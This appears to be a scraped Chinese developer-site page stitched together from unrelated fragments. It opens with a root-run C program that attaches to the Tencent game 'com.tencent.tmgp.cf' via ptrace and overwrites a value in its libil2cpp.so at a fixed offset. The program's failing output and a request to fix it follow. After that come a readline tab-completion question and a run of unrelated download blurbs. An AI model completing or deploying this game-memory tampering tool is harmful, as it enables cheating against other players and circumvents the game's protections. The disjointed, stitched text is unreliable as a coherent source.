fopen(filename, "r"); if (fp) { if (fgets(cmdline, sizeof(cmdline), fp)) { cmdline[strcspn(cmdline, "\n")] = '\0'; if (strcmp(packageName, cmdline) == 0) { fclose(fp); closedir(dir); return id; } } fclose(fp); } } } } closedir(dir); return -1; } // 获取模块内存信息(增强权限检查) ModuleInfo get_module_info(int pid, const char *module_name) { ModuleInfo info = {0}; FILE *fp; char line[8192]; char filename[32]; snprintf(filename, sizeof(filename), "/proc/%d/maps", pid); if ((fp = fopen(filename, "r")) == NULL) { perror("打开maps文件失败"); return info; } while (fgets(line, sizeof(line), fp)) { if (strstr(line, module_name)) { uint64_t start, end; char perms[5], offset[17], dev[6], inode[11], pathname[256]; // 增强解析逻辑 if (sscanf(line, "%lx-%lx %4s %16s %5s %10s %255[^\n]", &start, &end, perms, offset, dev, inode, pathname) >= 6) { if (start < end) { if (info.count < 200) { info.ranges[info.count].start_addr = start; info.ranges[info.count].end_addr = end; strncpy(info.ranges[info.count].permissions, perms, 4); info.ranges[info.count].permissions[4] = '\0'; info.count++; } else { printf("警告:模块映射段过多(超过200段),部分段未记录\n"); break; } } } } } fclose(fp); return info; } // 使用ptrace安全写入DWORD int SafeWriteDword(int pid, uint64_t addr, uint32_t value) { // 附加到目标进程 if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) { perror("ptrace附加失败"); return -1; } // 等待进程暂停 int status; waitpid(pid, &status, 0); if (!WIFSTOPPED(status)) { perror("进程未暂停"); ptrace(PTRACE_DETACH, pid, NULL, NULL); return -1; } // 逐字写入(避免对齐问题) for (int i = 0; i < sizeof(uint32_t); i++) { uint8_t byte = (value >> (i * 8)) & 0xFF; long data = ptrace(PTRACE_PEEKTEXT, pid, addr + i, NULL); if (data == -1 && errno) { perror("ptrace读取失败"); ptrace(PTRACE_DETACH, pid, NULL, NULL); return -1; } // 修改单个字节 long new_data = (data & ~0xFF) | byte; if (ptrace(PTRACE_POKETEXT, pid, addr + i, new_data) == -1) { perror("ptrace写入失败"); ptrace(PTRACE_DETACH, pid, NULL, NULL); return -1; } } // 分离目标进程 if (ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1) { perror("ptrace分离失败"); return -1; } return 0; } // 使用ptrace安全读取DWORD int SafeReadDword(int pid, uint64_t addr, uint32_t *value) { *value = 0; // 附加到目标进程 if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) { perror("ptrace附加失败"); return -1; } // 等待进程暂停 int status; waitpid(pid, &status, 0); if (!WIFSTOPPED(status)) { perror("进程未暂停"); ptrace(PTRACE_DETACH, pid, NULL, NULL); return -1; } // 逐字读取(避免对齐问题) for (int i = 0; i < sizeof(uint32_t); i++) { long data = ptrace(PTRACE_PEEKTEXT, pid, addr + i, NULL); if (data == -1 && errno) { perror("ptrace读取失败"); ptrace(PTRACE_DETACH, pid, NULL, NULL); return -1; } *value |= ((uint32_t)(data & 0xFF)) << (i * 8); } // 分离目标进程 if (ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1) { perror("ptrace分离失败"); return -1; } return 0; } // 使用__builtin___clear_cache刷新缓存 int flush_with_builtin(uint64_t addr, size_t size) { char *start = (char *)(addr & ~(4095ULL)); char *end = start + size; __builtin___clear_cache(start, end); printf("成功: 使用__builtin___clear_cache刷新指令缓存\n"); return 0; } // 五级强刷新机制 int enhanced_flush_cache(uint64_t addr, size_t size) { uint64_t aligned_addr = addr & ~(4095ULL); size_t aligned_size = ((addr + size - aligned_addr + 4095) / 4096) * 4096; #ifdef __aarch64__ // 1. 优先使用__builtin___clear_cache if (flush_with_builtin(aligned_addr, aligned_size) == 0) { return 0; } // 2. 尝试系统调用刷新 const int *syscall_num = cache_flush_syscalls; while (*syscall_num != 0) { int ret_instr = syscall(*syscall_num, aligned_addr, aligned_size, CACHE_TYPE_INSTRUCTION); if (ret_instr == 0) { printf("成功: 使用syscall %d 刷新缓存\n", *syscall_num); return 0; } syscall_num++; } // 3. mprotect内存属性修改方案 void *page_start = (void *)aligned_addr; int pagesize = sysconf(_SC_PAGESIZE); unsigned long page_count = (aligned_size + pagesize - 1) / pagesize; int protection = PROT_READ | PROT_WRITE | PROT_EXEC; if (mprotect(page_start, page_count * pagesize, protection) == 0) { printf("成功: 通过mprotect修改内存保护属性刷新缓存\n"); return 0; } // 4. msync强制同步方案 if (msync((void *)aligned_addr, aligned_size, MS_SYNC | MS_INVALIDATE) == 0) { printf("成功: 使用msync同步刷新缓存\n"); return 0; } // 5. 终极方案:重建内存映射 void *tmp = mmap(NULL, aligned_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (tmp) { memcpy(tmp, (void *)aligned_addr, aligned_size); munmap((void *)aligned_addr, aligned_size); mmap((void *)aligned_addr, aligned_size, PROT_READ | PROT_EXEC, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0); memcpy((void *)aligned_addr, tmp, aligned_size); munmap(tmp, aligned_size); printf("成功: 通过重建内存映射刷新缓存\n"); return 0; } #endif perror("所有缓存刷新方法均失败"); return -1; } // 暂停目标进程 int pause_process(int pid) { if (kill(pid, SIGSTOP) == -1) { perror("发送SIGSTOP失败"); return -1; } // 等待进程真正停止 int status; waitpid(pid, &status, WUNTRACED); if (!WIFSTOPPED(status)) { perror("进程未正确停止"); return -1; } printf("进程已暂停(PID: %d)\n", pid); return 0; } // 恢复目标进程 int resume_process(int pid) { if (kill(pid, SIGCONT) == -1) { perror("发送SIGCONT失败"); return -1; } printf("进程已恢复运行(PID: %d)\n", pid); return 0; } // 主Hook函数 void hook_il2cpp() { const char *packageName = "com.tencent.tmgp.cf"; const uint64_t HOOK_OFFSET = 0x7EFD168; const uint32_t HOOK_VALUE = 505416143; const uint32_t ORIGINAL_VALUE = 505416142; processInfo.pid = getPID(packageName); if (processInfo.pid <= 0) { printf("获取PID失败\n"); return; } printf("获取到目标进程PID: %d\n", processInfo.pid); ModuleInfo module_info = get_module_info(processInfo.pid, "libil2cpp.so"); if (module_info.count == 0) { printf("获取SO模块地址失败(可能无权限或模块未加载)\n"); return; } // 使用第一个可执行段的起始地址作为模块基址 uint64_t module_base = 0; for (int i = 0; i < module_info.count; i++) { if (strstr(module_info.ranges[i].permissions, "x")) { module_base = module_info.ranges[i].start_addr; break; } } if (module_base == 0) { printf("未找到可执行段,使用第一个段作为基址\n"); module_base = module_info.ranges[0].start_addr; } uint64_t target_addr = module_base + HOOK_OFFSET; printf("\nlibil2cpp.so 模块基址: 0x%016lx\n", module_base); printf("目标Hook地址: 0x%016lx (基址 + 0x%lx)\n", target_addr, HOOK_OFFSET); // 验证目标地址是否在模块范围内且具有写权限 int in_range = 0; int has_write_permission = 0; for (int i = 0; i < module_info.count; i++) { if (target_addr >= module_info.ranges[i].start_addr && target_addr <= module_info.ranges[i].end_addr) { in_range = 1; if (strstr(module_info.ranges[i].permissions, "w")) { has_write_permission = 1; } break; } } if (!in_range) { printf("\n目标地址0x%016lx超出模块范围,退出操作\n", target_addr); return; } if (!has_write_permission) { printf("\n警告:目标地址无写权限,尝试修改内存保护属性\n"); } // 暂停进程进行内存操作 if (pause_process(processInfo.pid) != 0) { printf("暂停进程失败,退出Hook流程\n"); return; } // 读取原始值并验证 uint32_t original_val; if (SafeReadDword(processInfo.pid, target_addr, &original_val) != 0) { printf("读取原始值失败,恢复进程并退出\n"); resume_process(processInfo.pid); return; } printf("原始值: %u (预期: %u)\n", original_val, ORIGINAL_VALUE); if (original_val != ORIGINAL_VALUE) { printf("警告:原始值(%u)与预期值(%u)不匹配,继续操作但结果可能异常\n", original_val, ORIGINAL_VALUE); } // 写入新值 if (SafeWriteDword(processInfo.pid, target_addr, HOOK_VALUE) != 0) { printf("修改失败(可能因内存保护或权限问题),恢复进程并退出\n"); resume_process(processInfo.pid); return; } printf("成功写入新值: %u\n", HOOK_VALUE); // 刷新指令缓存 if (enhanced_flush_cache(target_addr & ~(4095), 4096) != 0) { printf("警告:缓存刷新失败,可能存在执行风险\n"); } // 验证新值 uint32_t new_val; if (SafeReadDword(processInfo.pid, target_addr, &new_val) == 0) { printf("验证修改: 新值 = %u (预期: %u)\n", new_val, HOOK_VALUE); if (new_val == HOOK_VALUE) { printf("\033[32m验证成功:值已修改为预期值\033[0m\n"); } else { printf("\033[31m验证失败:新值(%u)与预期值(%u)不匹配\033[0m\n", new_val, HOOK_VALUE); } } else { printf("验证修改失败(无法读取新值)\n"); } // 恢复进程运行 if (resume_process(processInfo.pid) != 0) { printf("恢复进程失败\n"); return; } printf("进程已恢复运行\n"); // 等待进程稳定 sleep(2); // 验证恢复后的值 uint32_t restored_val; if (SafeReadDword(processInfo.pid, target_addr, &restored_val) == 0) { printf("恢复后的值: %u (预期: %u)\n", restored_val, ORIGINAL_VALUE); if (restored_val == ORIGINAL_VALUE) { printf("\033[32m验证成功:值已恢复为原始值\033[0m\n"); } else { printf("\033[31m验证失败:恢复后的值(%u)与原始值(%u)不匹配\033[0m\n", restored_val, ORIGINAL_VALUE); } } else { printf("验证恢复值失败(可能无权限或地址不可读)\n"); } } int main() { if (getuid() != 0) { printf("需要root权限运行!\n"); return 1; } hook_il2cpp(); return 0; }获取到目标进程PID: 24442 libil2cpp.so 模块基址: 0x0000006f46366000 目标Hook地址: 0x0000006f4e263168 (基址 + 0x7efd168) 警告:目标地址无写权限,尝试修改内存保护属性 进程未正确停止: No child processes 暂停进程失败,退出Hook流程 [进程已结束 - 按回车关闭]修复好完整发给我 确认无任何报错后

matches = completion_matches(text, filename_completion_function); 这个补全路径只会补全一个匹配项 比如当前目录下有个etc目录,然后etc里有1.txt文件、abc子目录,然后abc中还有个2.txt 现在是我输入dir e,按tab键后补全成dir etc/ ,连续按tab键后还是显示dir etc/ 我想要的效果是:连续按tab键后,能循环显示出:dir etc/ dir etc/1.txt dir etc/abc/ dir etc/ 这样循环显示 然后如果我输入了dir etc/a,然后连续按tab键补全,则循环显示:dir etc/abc/ dir etc/abc/2.txt /* * return first found file name starting by the text'' or NULL if no * such file can be found * value of state'' is ignored * * it's caller's responsibility to free returned string */ char* filename_completion_function(const char* text, int state) { static DIR* dir = NULL; static char * filename = NULL, *dirname = NULL; static size_t filename_len = 0; struct dirent* entry; char* temp; size_t len; if (state == 0 || dir == NULL) { if (dir != NULL) { closedir(dir); dir = NULL; } temp = strrchr(text, '/'); if (temp) { temp++; filename = XREALLOC(MTYPE_TMP, filename, strlen(temp) + 1); (void)strcpy(filename, temp); len = temp - text; /* including last slash */ dirname = XREALLOC(MTYPE_TMP, dirname, len + 1); (void)strncpy(dirname, text, len); dirname[len] = '\0'; } else { filename = XSTRDUP(0, text); dirname = NULL; } /* support for ~user'' syntax */ if (dirname && *dirname == '~') { temp = tilde_expand(dirname); dirname = XREALLOC(MTYPE_TMP, dirname, strlen(temp) + 1); (void)strcpy(dirname, temp); /* safe */ XFREE(0, temp); /* no longer needed */ } /* will be used in cycle */ filename_len = strlen(filename); if (filename_len == 0) return (NULL); /* no expansion possible */ dir = opendir(dirname ? dirname : "."); if (!dir) return (NULL); /* cannot open the directory */ } /* find the match */ while ((entry = readdir(dir)) != NULL) { /* otherwise, get first entry where first */ /* filename_len characters are equal */ if (entry->d_name[0] == filename[0] #if defined(__SVR4) || defined(__linux__) && strlen(entry->d_name) >= filename_len #else && entry->d_namlen >= filename_len #endif && strncmp(entry->d_name, filename, filename_len) == 0) break; } if (entry) { /* match found */ struct stat stbuf; #if defined(__SVR4) || defined(__linux__) len = strlen(entry->d_name) + #else len = entry->d_namlen + #endif ((dirname) ? strlen(dirname) : 0) + 1 + 1; temp = XMALLOC(0, len); (void)sprintf(temp, "%s%s", dirname ? dirname : "", entry->d_name); /* safe */ /* test, if it's directory */ if (stat(temp, &stbuf) == 0 && S_ISDIR(stbuf.st_mode)) strcat(temp, "/"); /* safe */ } else temp = NULL; return (temp); } 源码,这个接口是readline库中自带的函数,然后你帮我优化代码,在这个接口的基础上,实现循环显示 实现效果如下: <Dahua>dir xx_di <Dahua>dir xx_dir/ <Dahua>dir xx_dir/abc/ <Dahua>dir xx_dir/1.txt <Dahua>dir xx_dir/ <Dahua>dir xx_dir/abc/ <Dahua>dir xx_dir/1.txt <Dahua>dir xx_dir/ <Dahua>dir xx_dir/abc/ <Dahua>dir xx_dir/1.txt <Dahua>dir xx_dir/ <Dahua>dir xx_dir/abc/ <Dahua>dir xx_dir/1.txt <Dahua>dir xx_dir/

最新推荐

recommend-type

造纸机变频分布传动与Modbus RTU通讯技术的应用及其实现

造纸机变频分布传动与Modbus RTU通讯技术的应用及其优势。首先,文中解释了变频分布传动系统的组成和功能,包括采用PLC(如S7-200SMART)、变频器(如英威腾、汇川、ABB)和触摸屏(如昆仑通泰)。其次,重点阐述了Modbus RTU通讯协议的作用,它不仅提高了系统的可靠性和抗干扰能力,还能实现对造纸机各个生产环节的精确监控和调节。最后,强调了该技术在提高造纸机运行效率、稳定性和产品质量方面的显著效果,适用于多种类型的造纸机,如圆网造纸机、长网多缸造纸机和叠网多缸造纸机。 适合人群:从事造纸机械制造、自动化控制领域的工程师和技术人员。 使用场景及目标:① 提升造纸机的自动化水平;② 实现对造纸机的精确控制,确保纸张质量和生产效率;③ 改善工业现场的数据传输和监控功能。 其他说明:文中提到的具体品牌和技术细节有助于实际操作和维护,同时也展示了该技术在不同纸厂的成功应用案例。
recommend-type

langchain4j-neo4j-0.29.1.jar中文文档.zip

1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
recommend-type

基于STC89C52单片机的智能衣架电路设计:服装店顾客行为数据分析与传输

内容概要:本文介绍了一种基于STC89C52单片机的智能衣架电路设计方案,旨在通过采集和分析顾客在服装店挑选和试穿衣物时的行为数据,帮助商家更好地了解顾客的购物习惯和偏好。该系统利用ADXL345三轴加速度传感器和HX711称重传感器分别检测衣架的角度变化和重量变化,记录服装被挑选和试穿的次数,并通过LCD1602显示屏实时显示这些数据。此外,蓝牙模块将数据传输到手机,方便店员和顾客查看。文中还简述了系统的硬件连接和软件代码设计。 适合人群:电子工程技术人员、嵌入式系统开发者、从事零售数据分析的专业人士。 使用场景及目标:适用于服装零售行业,帮助商家优化库存管理、提升顾客购物体验以及进行精准营销。通过对顾客行为数据的实时采集和分析,商家可以制定更有针对性的销售策略。 其他说明:本文不仅提供了详细的硬件原理图,还涉及了单片机编程的相关知识,有助于读者全面掌握智能衣架的设计与实现方法。
recommend-type

Visual C++.NET编程技术实战指南

根据提供的文件信息,可以生成以下知识点: ### Visual C++.NET编程技术体验 #### 第2章 定制窗口 - **设置窗口风格**:介绍了如何通过编程自定义窗口的外观和行为。包括改变窗口的标题栏、边框样式、大小和位置等。这通常涉及到Windows API中的`SetWindowLong`和`SetClassLong`函数。 - **创建六边形窗口**:展示了如何创建一个具有特殊形状边界的窗口,这类窗口不遵循标准的矩形形状。它需要使用`SetWindowRgn`函数设置窗口的区域。 - **创建异形窗口**:扩展了定制窗口的内容,提供了创建非标准形状窗口的方法。这可能需要创建一个不规则的窗口区域,并将其应用到窗口上。 #### 第3章 菜单和控制条高级应用 - **菜单编程**:讲解了如何创建和修改菜单项,处理用户与菜单的交互事件,以及动态地添加或删除菜单项。 - **工具栏编程**:阐述了如何使用工具栏,包括如何创建工具栏按钮、分配事件处理函数,并实现工具栏按钮的响应逻辑。 - **状态栏编程**:介绍了状态栏的创建、添加不同类型的指示器(如文本、进度条等)以及状态信息的显示更新。 - **为工具栏添加皮肤**:展示了如何为工具栏提供更加丰富的视觉效果,通常涉及到第三方的控件库或是自定义的绘图代码。 #### 第5章 系统编程 - **操作注册表**:解释了Windows注册表的结构和如何通过程序对其进行读写操作,这对于配置软件和管理软件设置非常关键。 - **系统托盘编程**:讲解了如何在系统托盘区域创建图标,并实现最小化到托盘、从托盘恢复窗口的功能。 - **鼠标钩子程序**:介绍了钩子(Hook)技术,特别是鼠标钩子,如何拦截和处理系统中的鼠标事件。 - **文件分割器**:提供了如何将文件分割成多个部分,并且能够重新组合文件的技术示例。 #### 第6章 多文档/多视图编程 - **单文档多视**:展示了如何在同一个文档中创建多个视图,这在文档编辑软件中非常常见。 #### 第7章 对话框高级应用 - **实现无模式对话框**:介绍了无模式对话框的概念及其应用场景,以及如何实现和管理无模式对话框。 - **使用模式属性表及向导属性表**:讲解了属性表的创建和使用方法,以及如何通过向导性质的对话框引导用户完成多步骤的任务。 - **鼠标敏感文字**:提供了如何实现点击文字触发特定事件的功能,这在阅读器和编辑器应用中很有用。 #### 第8章 GDI+图形编程 - **图像浏览器**:通过图像浏览器示例,展示了GDI+在图像处理和展示中的应用,包括图像的加载、显示以及基本的图像操作。 #### 第9章 多线程编程 - **使用全局变量通信**:介绍了在多线程环境下使用全局变量进行线程间通信的方法和注意事项。 - **使用Windows消息通信**:讲解了通过消息队列在不同线程间传递信息的技术,包括发送消息和处理消息。 - **使用CriticalSection对象**:阐述了如何使用临界区(CriticalSection)对象防止多个线程同时访问同一资源。 - **使用Mutex对象**:介绍了互斥锁(Mutex)的使用,用以同步线程对共享资源的访问,保证资源的安全。 - **使用Semaphore对象**:解释了信号量(Semaphore)对象的使用,它允许一个资源由指定数量的线程同时访问。 #### 第10章 DLL编程 - **创建和使用Win32 DLL**:介绍了如何创建和链接Win32动态链接库(DLL),以及如何在其他程序中使用这些DLL。 - **创建和使用MFC DLL**:详细说明了如何创建和使用基于MFC的动态链接库,适用于需要使用MFC类库的场景。 #### 第11章 ATL编程 - **简单的非属性化ATL项目**:讲解了ATL(Active Template Library)的基础使用方法,创建一个不使用属性化组件的简单项目。 - **使用ATL开发COM组件**:详细阐述了使用ATL开发COM组件的步骤,包括创建接口、实现类以及注册组件。 #### 第12章 STL编程 - **list编程**:介绍了STL(标准模板库)中的list容器的使用,讲解了如何使用list实现复杂数据结构的管理。 #### 第13章 网络编程 - **网上聊天应用程序**:提供了实现基本聊天功能的示例代码,包括客户端和服务器的通信逻辑。 - **简单的网页浏览器**:演示了如何创建一个简单的Web浏览器程序,涉及到网络通信和HTML解析。 - **ISAPI服务器扩展编程**:介绍了如何开发ISAPI(Internet Server API)服务器扩展来扩展IIS(Internet Information Services)的功能。 #### 第14章 数据库编程 - **ODBC数据库编程**:解释了ODBC(开放数据库互联)的概念,并提供了使用ODBC API进行数据库访问的示例。 - **ADO编程**:介绍了ADO(ActiveX Data Objects)技术,讲解了如何使用ADO进行数据库的增删改查等操作。 #### 第15章 HTML帮助系统编程 - **创建HTML帮助文件**:讲解了如何创建HTML帮助文件(.chm),这是微软帮助系统的一种形式。 - **区分上下文帮助**:提供了在应用程序中实现上下文敏感帮助的技术示例。 #### 第16章 安装和部署项目 - **用安装程序向导创建安装项目**:介绍了如何使用Visual Studio中的安装和部署项目向导,快速创建安装程序。 - **部署应用程序**:阐述了部署应用程序到目标系统的过程,以及如何确保应用程序的正确安装和运行。 以上内容涵盖了Visual C++.NET编程技术体验一书中涉及的各个技术点,并对每个章节中的示例做了详细的说明。这些知识点对于理解和掌握Visual C++.NET编程非常重要,并能够帮助读者在实际项目开发中应用这些技术。
recommend-type

HarmonyOS内核深度探秘:优化自由行旅游系统的策略

# 1. HarmonyOS内核概述与旅游系统需求分析 ## 1.1 HarmonyOS内核概述 HarmonyOS(鸿蒙操作系统)是由华为开发的一个分布式操作系统,旨在提供跨多种设备的无缝体验。其内核设计理念强调高效、安全和模块化,以微内核架构和分布式能力
recommend-type

tkinter模块所有控件

<think>好的,我现在需要回答用户关于Tkinter模块中所有控件列表的问题。首先,我需要回忆Tkinter的基础知识,确保自己了解各个控件的名称和用途。用户希望得到所有支持的控件列表,所以必须全面覆盖,不能遗漏。 首先,我应该从Tkinter的标准控件开始。常见的控件包括Label、Button、Entry这些基础部件。然后是Frame,用于布局,还有Canvas用于绘图。接下来是Checkbutton、Radiobutton,这些属于选择类控件。Listbox和Scrollbar通常一起使用,处理滚动内容。还有Scale(滑块)、Spinbox、Menu、Menubutton这些可能
recommend-type

局域网五子棋游戏:娱乐与聊天的完美结合

标题“网络五子棋”和描述“适合于局域网之间娱乐和聊天!”以及标签“五子棋 网络”所涉及的知识点主要围绕着五子棋游戏的网络版本及其在局域网中的应用。以下是详细的知识点: 1. 五子棋游戏概述: 五子棋是一种两人对弈的纯策略型棋类游戏,又称为连珠、五子连线等。游戏的目标是在一个15x15的棋盘上,通过先后放置黑白棋子,使得任意一方先形成连续五个同色棋子的一方获胜。五子棋的规则简单,但策略丰富,适合各年龄段的玩家。 2. 网络五子棋的意义: 网络五子棋是指可以在互联网或局域网中连接进行对弈的五子棋游戏版本。通过网络版本,玩家不必在同一地点即可进行游戏,突破了空间限制,满足了现代人们快节奏生活的需求,同时也为玩家们提供了与不同对手切磋交流的机会。 3. 局域网通信原理: 局域网(Local Area Network,LAN)是一种覆盖较小范围如家庭、学校、实验室或单一建筑内的计算机网络。它通过有线或无线的方式连接网络内的设备,允许用户共享资源如打印机和文件,以及进行游戏和通信。局域网内的计算机之间可以通过网络协议进行通信。 4. 网络五子棋的工作方式: 在局域网中玩五子棋,通常需要一个客户端程序(如五子棋.exe)和一个服务器程序。客户端负责显示游戏界面、接受用户输入、发送落子请求给服务器,而服务器负责维护游戏状态、处理玩家的游戏逻辑和落子请求。当一方玩家落子时,客户端将该信息发送到服务器,服务器确认无误后将更新后的棋盘状态传回给所有客户端,更新显示。 5. 五子棋.exe程序: 五子棋.exe是一个可执行程序,它使得用户可以在个人计算机上安装并运行五子棋游戏。该程序可能包含了游戏的图形界面、人工智能算法(如果支持单机对战AI的话)、网络通信模块以及游戏规则的实现。 6. put.wav文件: put.wav是一个声音文件,很可能用于在游戏进行时提供声音反馈,比如落子声。在网络环境中,声音文件可能被用于提升玩家的游戏体验,尤其是在局域网多人游戏场景中。当玩家落子时,系统会播放.wav文件中的声音,为游戏增添互动性和趣味性。 7. 网络五子棋的技术要求: 为了确保多人在线游戏的顺利进行,网络五子棋需要具备一些基本的技术要求,包括但不限于稳定的网络连接、高效的数据传输协议(如TCP/IP)、以及安全的数据加密措施(如果需要的话)。此外,还需要有一个良好的用户界面设计来提供直观和舒适的用户体验。 8. 社交与娱乐: 网络五子棋除了是一个娱乐游戏外,它还具有社交功能。玩家可以通过游戏内的聊天系统进行交流,分享经验和策略,甚至通过网络寻找新的朋友。这使得网络五子棋不仅是一个个人娱乐工具,同时也是一种社交活动。 总结来说,网络五子棋结合了五子棋游戏的传统魅力和现代网络技术,使得不同地区的玩家能够在局域网内进行娱乐和聊天,既丰富了人们的娱乐生活,又加强了人际交流。而实现这一切的基础在于客户端程序的设计、服务器端的稳定运行、局域网的高效通信,以及音效文件增强的游戏体验。
recommend-type

自由行旅游新篇章:HarmonyOS技术融合与系统架构深度解析

# 1. HarmonyOS技术概述 ## 1.1 HarmonyOS的起源与发展 HarmonyOS(鸿蒙操作系统)由华为公司开发,旨在构建全场景分布式OS,以应对不同设备间的互联问题。自从2019年首次发布以来,HarmonyOS迅速成长,并迅速应用于智能手机、平板、智能穿戴、车载设备等多种平台。该系
recommend-type

足底支撑相到达73%是什么问题

<think>好的,我现在要处理用户的问题:“足底支撑相达到73%可能的原因及影响”。首先,需要理解用户提到的“足底支撑相73%”具体指什么。足底支撑相通常指步态周期中脚与地面接触的时间占比,正常范围大约在60%-62%左右。如果达到73%,明显超出正常范围,可能意味着步态异常。 接下来,需要确定可能的原因。可能的原因包括生物力学异常,比如足弓异常(扁平足或高弓足)、踝关节活动度受限,或者肌肉力量不足,特别是小腿和足部肌肉。另外,神经系统疾病如脑卒中或帕金森病可能影响步态控制。骨骼关节问题如关节炎、髋膝关节病变也可能导致支撑时间延长。还有代偿性步态,比如因疼痛或受伤而改变步态模式。 然后是
recommend-type

宾馆预约系统开发与优化建议

宾馆预约系统是一个典型的在线服务应用,它允许用户通过互联网平台预定宾馆房间。这种系统通常包含多个模块,比如用户界面、房态管理、预订处理、支付处理和客户评价等。从技术层面来看,构建一个宾馆预约系统涉及到众多的IT知识和技术细节,下面将详细说明。 ### 标题知识点 - 宾馆预约系统 #### 1. 系统架构设计 宾馆预约系统作为一个完整的应用,首先需要进行系统架构设计,决定其采用的软件架构模式,如B/S架构或C/S架构。此外,系统设计还需要考虑扩展性、可用性、安全性和维护性。一般会采用三层架构,包括表示层、业务逻辑层和数据访问层。 #### 2. 前端开发 前端开发主要负责用户界面的设计与实现,包括用户注册、登录、房间搜索、预订流程、支付确认、用户反馈等功能的页面展示和交互设计。常用的前端技术栈有HTML, CSS, JavaScript, 以及各种前端框架如React, Vue.js或Angular。 #### 3. 后端开发 后端开发主要负责处理业务逻辑,包括用户管理、房间状态管理、订单处理等。后端技术包括但不限于Java (使用Spring Boot框架), Python (使用Django或Flask框架), PHP (使用Laravel框架)等。 #### 4. 数据库设计 数据库设计对系统的性能和可扩展性至关重要。宾馆预约系统可能需要设计的数据库表包括用户信息表、房间信息表、预订记录表、支付信息表等。常用的数据库系统有MySQL, PostgreSQL, MongoDB等。 #### 5. 网络安全 网络安全是宾馆预约系统的重要考虑因素,包括数据加密、用户认证授权、防止SQL注入、XSS攻击、CSRF攻击等。系统需要实现安全的认证机制,比如OAuth或JWT。 #### 6. 云服务和服务器部署 现代的宾馆预约系统可能部署在云平台上,如AWS, Azure, 腾讯云或阿里云。在云平台上,系统可以按需分配资源,提高系统的稳定性和弹性。 #### 7. 付款接口集成 支付模块需要集成第三方支付接口,如支付宝、微信支付、PayPal等,需要处理支付请求、支付状态确认、退款等业务。 #### 8. 接口设计与微服务 系统可能采用RESTful API或GraphQL等接口设计方式,提供服务的微服务化,以支持不同设备和服务的接入。 ### 描述知识点 - 这是我个人自己做的 请大家帮忙修改哦 #### 个人项目经验与团队合作 描述中的这句话暗示了该宾馆预约系统可能是由一个个人开发者创建的。个人开发和团队合作在软件开发流程中有着显著的不同。个人开发者需要关注的方面包括项目管理、需求分析、代码质量保证、测试和部署等。而在团队合作中,每个成员会承担不同的职责,需要有效的沟通和协作。 #### 用户反馈与迭代 描述还暗示了该系统目前处于需要外部反馈和修改的阶段。这表明系统可能还处于开发或测试阶段,需要通过用户的实际使用反馈来不断迭代改进。 ### 标签知识点 - 200 #### 未提供信息 “200”这个标签可能指的是HTTP状态码中表示请求成功(OK)的200状态码。但是,由于没有提供更多的上下文信息,无法进一步分析其在本例中的具体含义。 ### 压缩包子文件的文件名称列表知识点 - 1111 #### 文件命名与管理 “1111”这个文件名称可能是一个版本号、日期标记或者是一个简单的标识符。文件命名应当遵循一定的规则,以确保文件的可追溯性和管理的便利性。在软件开发过程中,合理组织文件和版本控制(如使用Git)是必不可少的。 综上所述,宾馆预约系统的开发是一项复杂的工程,它涉及前后端的开发、数据库设计、系统安全、接口设计等多个方面。开发者在开发过程中需要不断学习和应用各类IT知识,以确保系统能够安全、高效、稳定地运行。而对于个人开发项目,如何合理利用有限资源、高效地管理和优化项目过程也是至关重要的。